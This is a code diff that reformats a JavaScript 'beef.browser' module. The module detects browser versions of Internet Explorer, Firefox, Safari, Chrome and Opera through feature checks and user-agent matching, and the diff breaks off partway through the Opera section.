--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -11,730 +11,1644 @@
  */
 beef.browser = {
 
-	/**
-	 * Returns the user agent that the browser is claiming to be.
-	 * @example: beef.browser.getBrowserReportedName()
-	 */
-	getBrowserReportedName: function() {
-		return navigator.userAgent;
-	},
+    /**
+     * Returns the user agent that the browser is claiming to be.
+     * @example: beef.browser.getBrowserReportedName()
+     */
+    getBrowserReportedName:function () {
+        return navigator.userAgent;
+    },
 
-	/**
-	 * Returns true if IE6.
-	 * @example: beef.browser.isIE6()
-	 */
-	isIE6: function() {
-		return !window.XMLHttpRequest && !window.globalStorage;
-	},
+    /**
+     * Returns true if IE6.
+     * @example: beef.browser.isIE6()
+     */
+    isIE6:function () {
+        return !window.XMLHttpRequest && !window.globalStorage;
+    },
 
-	/**
-	 * Returns true if IE7.
-	 * @example: beef.browser.isIE7()
-	 */
-	isIE7: function() {
-		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
-	},
+    /**
+     * Returns true if IE7.
+     * @example: beef.browser.isIE7()
+     */
+    isIE7:function () {
+        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode;
+    },
 
-	/**
-	 * Returns true if IE8.
-	 * @example: beef.browser.isIE8()
-	 */
-	isIE8: function() {
-		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
-	},
+    /**
+     * Returns true if IE8.
+     * @example: beef.browser.isIE8()
+     */
+    isIE8:function () {
+        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
+    },
 
-	/**
-	 * Returns true if IE9.
-	 * @example: beef.browser.isIE9()
-	 */
-	isIE9: function() {
-		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
-	},
+    /**
+     * Returns true if IE9.
+     * @example: beef.browser.isIE9()
+     */
+    isIE9:function () {
+        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined";
+    },
 
-	/**
-	 *
-	 * Returns true if IE10.
-	 * @example: beef.browser.isIE10()
-	 */
-	isIE10: function() {
-		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
-	},
+    /**
+     *
+     * Returns true if IE10.
+     * @example: beef.browser.isIE10()
+     */
+    isIE10:function () {
+        return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined";
+    },
 
-	/**
-	 * Returns true if IE.
-	 * @example: beef.browser.isIE()
-	 */
-	isIE: function() {
-		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
-	},
+    /**
+     * Returns true if IE.
+     * @example: beef.browser.isIE()
+     */
+    isIE:function () {
+        return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
+    },
 
-	/**
-	 * Returns true if FF2.
-	 * @example: beef.browser.isFF2()
-	 */
-	isFF2: function() {
-		return !!window.globalStorage && !window.postMessage;
-	},
+    /**
+     * Returns true if FF2.
+     * @example: beef.browser.isFF2()
+     */
+    isFF2:function () {
+        return !!window.globalStorage && !window.postMessage;
+    },
 
-	/**
-	 * Returns true if FF3.
-	 * @example: beef.browser.isFF3()
-	 */
-	isFF3: function() {
-		return !!window.globalStorage && !!window.postMessage && !JSON.parse;
-	},
+    /**
+     * Returns true if FF3.
+     * @example: beef.browser.isFF3()
+     */
+    isFF3:function () {
+        return !!window.globalStorage && !!window.postMessage && !JSON.parse;
+    },
 
-	/**
-	 * Returns true if FF3.5.
-	 * @example: beef.browser.isFF3_5()
-	 */
-	isFF3_5: function() {
-		return !!window.globalStorage && !!JSON.parse && !window.FileReader;
-	},
+    /**
+     * Returns true if FF3.5.
+     * @example: beef.browser.isFF3_5()
+     */
+    isFF3_5:function () {
+        return !!window.globalStorage && !!JSON.parse && !window.FileReader;
+    },
 
-	/**
-	 * Returns true if FF3.6.
-	 * @example: beef.browser.isFF3_6()
-	 */
-	isFF3_6: function() {
-		return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
-	},
+    /**
+     * Returns true if FF3.6.
+     * @example: beef.browser.isFF3_6()
+     */
+    isFF3_6:function () {
+        return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState;
+    },
 
-	/**
-	 * Returns true if FF4.
-	 * @example: beef.browser.isFF4()
-	 */
-	isFF4: function() {
-		return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
-	},
+    /**
+     * Returns true if FF4.
+     * @example: beef.browser.isFF4()
+     */
+    isFF4:function () {
+        return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null;
+    },
 
-	/**
-	 * Returns true if FF5.
-	 * @example: beef.browser.isFF5()
-	 */
-	isFF5: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
-	},
+    /**
+     * Returns true if FF5.
+     * @example: beef.browser.isFF5()
+     */
+    isFF5:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null;
+    },
 
-	/**
-	 * Returns true if FF6.
-	 * @example: beef.browser.isFF6()
-	 */
-	isFF6: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
-	},
+    /**
+     * Returns true if FF6.
+     * @example: beef.browser.isFF6()
+     */
+    isFF6:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null;
+    },
 
-	/**
-	 * Returns true if FF7.
-	 * @example: beef.browser.isFF7()
-	 */
-	isFF7: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
-	},
+    /**
+     * Returns true if FF7.
+     * @example: beef.browser.isFF7()
+     */
+    isFF7:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null;
+    },
 
-	/**
-	 * Returns true if FF8.
-	 * @example: beef.browser.isFF8()
-	 */
-	isFF8: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
-	},
+    /**
+     * Returns true if FF8.
+     * @example: beef.browser.isFF8()
+     */
+    isFF8:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null;
+    },
 
-	/**
-	 * Returns true if FF9.
-	 * @example: beef.browser.isFF9()
-	 */
-	isFF9: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
-	},
+    /**
+     * Returns true if FF9.
+     * @example: beef.browser.isFF9()
+     */
+    isFF9:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null;
+    },
 
-	/**
-	 * Returns true if FF10.
-	 * @example: beef.browser.isFF10()
-	 */
-	isFF10: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
-	},
+    /**
+     * Returns true if FF10.
+     * @example: beef.browser.isFF10()
+     */
+    isFF10:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null;
+    },
 
-	/**
-	 * Returns true if FF11.
-	 * @example: beef.browser.isFF11()
-	 */
-	isFF11: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
-	},
+    /**
+     * Returns true if FF11.
+     * @example: beef.browser.isFF11()
+     */
+    isFF11:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null;
+    },
 
-	/**
-	 * Returns true if FF12
-	 * @example: beef.browser.isFF12()
-	 */
-	isFF12: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
-	},
+    /**
+     * Returns true if FF12
+     * @example: beef.browser.isFF12()
+     */
+    isFF12:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null;
+    },
 
-	/**
-	 * Returns true if FF13
-	 * @example: beef.browser.isFF13()
-	 */
-	isFF13: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
-	},
+    /**
+     * Returns true if FF13
+     * @example: beef.browser.isFF13()
+     */
+    isFF13:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
+    },
 
-	/**
-	 * Returns true if FF14
-	 * @example: beef.browser.isFF14()
-	 */
-	isFF14: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
-	},
+    /**
+     * Returns true if FF14
+     * @example: beef.browser.isFF14()
+     */
+    isFF14:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
+    },
 
-	/**
-	 * Returns true if FF15
-	 * @example: beef.browser.isFF15()
-	 */
-	isFF15: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
-	},
+    /**
+     * Returns true if FF15
+     * @example: beef.browser.isFF15()
+     */
+    isFF15:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
+    },
 
-	/**
-	 * Returns true if FF16
-	 * @example: beef.browser.isFF16()
-	 */
-	isFF16: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
-	},
+    /**
+     * Returns true if FF16
+     * @example: beef.browser.isFF16()
+     */
+    isFF16:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
+    },
 
-	/**
-	 * Returns true if FF17
-	 * @example: beef.browser.isFF17()
-	 */
-	isFF17: function() {
-		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
-	},
+    /**
+     * Returns true if FF17
+     * @example: beef.browser.isFF17()
+     */
+    isFF17:function () {
+        return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null;
+    },
 
-	/**
-	 * Returns true if FF18
-	 * @example: beef.browser.isFF18()
-	 */
-	isFF18: function() {
-		return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
-	},
+    /**
+     * Returns true if FF18
+     * @example: beef.browser.isFF18()
+     */
+    isFF18:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null;
+    },
 
-	/**
-	 * Returns true if FF19
-	 * @example: beef.browser.isFF19()
-	 */
-    isFF19: function() {
-return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/19\./) != null;
-	},
+    /**
+     * Returns true if FF19
+     * @example: beef.browser.isFF19()
+     */
+    isFF19:function () {
+        return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/19\./) != null;
+    },
 
-	/**
-	 * Returns true if FF.
-	 * @example: beef.browser.isFF()
-	 */
-	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19();
-	},
+    /**
+     * Returns true if FF.
+     * @example: beef.browser.isFF()
+     */
+    isFF:function () {
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19();
+    },
 
-	/**
-	 * Returns true if Safari 4.xx
-	 * @example: beef.browser.isS4()
-	 */
-	isS4: function() {
-		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
-	},
+    /**
+     * Returns true if Safari 4.xx
+     * @example: beef.browser.isS4()
+     */
+    isS4:function () {
+        return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
 
-	/**
-	 * Returns true if Safari 5.xx
-	 * @example: beef.browser.isS5()
-	 */
-	isS5: function() {
-		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
-	},
+    /**
+     * Returns true if Safari 5.xx
+     * @example: beef.browser.isS5()
+     */
+    isS5:function () {
+        return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
 
-	/**
- 	 * Returns true if Safari 6.xx
-	 * @example: beef.browser.isS6()
-	 */
-	isS6: function() {
-		return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
-	},
+    /**
+     * Returns true if Safari 6.xx
+     * @example: beef.browser.isS6()
+     */
+    isS6:function () {
+        return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+    },
 
-	/**
-	 * Returns true if Safari.
-	 * @example: beef.browser.isS()
-	 */
-	isS: function() {
-		return this.isS4() || this.isS5() || this.isS6();
-	},
+    /**
+     * Returns true if Safari.
+     * @example: beef.browser.isS()
+     */
+    isS:function () {
+        return this.isS4() || this.isS5() || this.isS6();
+    },
 
-	/**
-	 * Returns true if Chrome 5.
-	 * @example: beef.browser.isC5()
-	 */
-	isC5: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==5)?true:false);
-	},
+    /**
+     * Returns true if Chrome 5.
+     * @example: beef.browser.isC5()
+     */
+    isC5:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 5) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 6.
-	 * @example: beef.browser.isC6()
-	 */
-	isC6: function() {
-		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==6)?true:false);
-	},
+    /**
+     * Returns true if Chrome 6.
+     * @example: beef.browser.isC6()
+     */
+    isC6:function () {
+        return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 6) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 7.
-	 * @example: beef.browser.isC7()
-	 */
-	isC7: function() {
-		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==7)?true:false);
-	},
+    /**
+     * Returns true if Chrome 7.
+     * @example: beef.browser.isC7()
+     */
+    isC7:function () {
+        return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 7) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 8.
-	 * @example: beef.browser.isC8()
-	 */
-	isC8: function() {
-		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==8)?true:false);
-	},
+    /**
+     * Returns true if Chrome 8.
+     * @example: beef.browser.isC8()
+     */
+    isC8:function () {
+        return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 8) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 9.
-	 * @example: beef.browser.isC9()
-	 */
-	isC9: function() {
-		return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==9)?true:false);
-	},
+    /**
+     * Returns true if Chrome 9.
+     * @example: beef.browser.isC9()
+     */
+    isC9:function () {
+        return (!!window.chrome && !!window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 9) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 10.
-	 * @example: beef.browser.isC10()
-	 */
-	isC10: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==10)?true:false);
-	},
+    /**
+     * Returns true if Chrome 10.
+     * @example: beef.browser.isC10()
+     */
+    isC10:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 10) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 11.
-	 * @example: beef.browser.isC11()
-	 */
-	isC11: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==11)?true:false);
-	},
+    /**
+     * Returns true if Chrome 11.
+     * @example: beef.browser.isC11()
+     */
+    isC11:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 11) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 12.
-	 * @example: beef.browser.isC12()
-	 */
-	isC12: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==12)?true:false);
-	},
+    /**
+     * Returns true if Chrome 12.
+     * @example: beef.browser.isC12()
+     */
+    isC12:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 12) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 13.
-	 * @example: beef.browser.isC13()
-	 */
-	isC13: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==13)?true:false);
-	},
+    /**
+     * Returns true if Chrome 13.
+     * @example: beef.browser.isC13()
+     */
+    isC13:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 13) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 14.
-	 * @example: beef.browser.isC14()
-	 */
-	isC14: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==14)?true:false);
-	},
+    /**
+     * Returns true if Chrome 14.
+     * @example: beef.browser.isC14()
+     */
+    isC14:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 14) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 15.
-	 * @example: beef.browser.isC15()
-	 */
-	isC15: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==15)?true:false);
-	},
+    /**
+     * Returns true if Chrome 15.
+     * @example: beef.browser.isC15()
+     */
+    isC15:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 15) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 16.
-	 * @example: beef.browser.isC16()
-	 */
-	isC16: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
-	},
+    /**
+     * Returns true if Chrome 16.
+     * @example: beef.browser.isC16()
+     */
+    isC16:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 16) ? true : false);
+    },
 
     /**
      * Returns true if Chrome 17.
      * @example: beef.browser.isC17()
      */
-    isC17: function() {
-        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
+    isC17:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 17) ? true : false);
     },
 
-	/**
-	 * Returns true if Chrome 18.
-	 * @example: beef.browser.isC18()
-	 */
-	isC18: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==18)?true:false);
-	},
+    /**
+     * Returns true if Chrome 18.
+     * @example: beef.browser.isC18()
+     */
+    isC18:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 18) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 19.
-	 * @example: beef.browser.isC19()
-	 */
-	isC19: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
-	},
+    /**
+     * Returns true if Chrome 19.
+     * @example: beef.browser.isC19()
+     */
+    isC19:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
+    },
 
-	/**
-	 * Returns true if Chrome 20.
-	 * @example: beef.browser.isC20()
-	 */
-	isC20: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
-	},
+    /**
+     * Returns true if Chrome 20.
+     * @example: beef.browser.isC20()
+     */
+    isC20:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
+    },
 
     /**
      * Returns true if Chrome 21.
      * @example: beef.browser.isC21()
      */
-    isC21: function() {
-        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
+    isC21:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
     },
 
-	/**
-	 * Returns true if Chrome 22.
-	 * @example: beef.browser.isC22()
-	 */
-	isC22: function() {
-		return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
-	},
+    /**
+     * Returns true if Chrome 22.
+     * @example: beef.browser.isC22()
+     */
+    isC22:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
+    },
 
     /**
      * Returns true if Chrome 23.
      * @example: beef.browser.isC23()
      */
-    isC23: function() {
-        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
+    isC23:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
     },
 
     /**
      * Returns true if Chrome 24.
      * @example: beef.browser.isC24()
      */
-    isC24: function() {
-        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==24)?true:false);
+    isC24:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
-	/**
-	 * Returns true if Chrome.
-	 * @example: beef.browser.isC()
-	 */
-	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24();
-	},
+    /**
+     * Returns true if Chrome.
+     * @example: beef.browser.isC()
+     */
+    isC:function () {
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24();
+    },
 
-	/**
-        * Returns true if Opera 9.50 through 9.52.
-        * @example: beef.browser.isO9_52()
-        */
-       isO9_52: function() {
-           return (!!window.opera  && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
-       },
+    /**
+     * Returns true if Opera 9.50 through 9.52.
+     * @example: beef.browser.isO9_52()
+     */
+    isO9_52:function () {
+        return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
+    },
 
-       /**
-        * Returns true if Opera 9.60 through 9.64.
-        * @example: beef.browser.isO9_60()
-        */
-       isO9_60: function() {
-           return (!!window.opera  && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
-       },
+    /**
+     * Returns true if Opera 9.60 through 9.64.
+     * @example: beef.browser.isO9_60()
+     */
+    isO9_60:function () {
+        return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
+    },
 
-       /**
-        * Returns true if Opera 10.xx.
-        * @example: beef.browser.isO10()
-        */
-       isO10: function() {
-           return (!!window.opera  && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
-       },
+    /**
+     * Returns true if Opera 10.xx.
+     * @example: beef.browser.isO10()
+     */
+    isO10:function () {
+        return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
+    },
 
-       /**
-        * Returns true if Opera 11.xx.
-        * @example: beef.browser.isO11()
-        */
-       isO11: function() {
-           return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
-       },
+    /**
+     * Returns true if Opera 11.xx.
+     * @example: beef.browser.isO11()
+     */
+    isO11:function () {
+        return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
+    },
 
-        /**
-         * Returns true if Opera 12.xx.
-         * @example: beef.browser.isO12()
-         */
-        isO12: function() {
-            return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
-        },
+    /**
+     * Returns true if Opera 12.xx.
+     * @example: beef.browser.isO12()
+     */
+    isO12:function () {
+        return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
+    },
 
-	/**
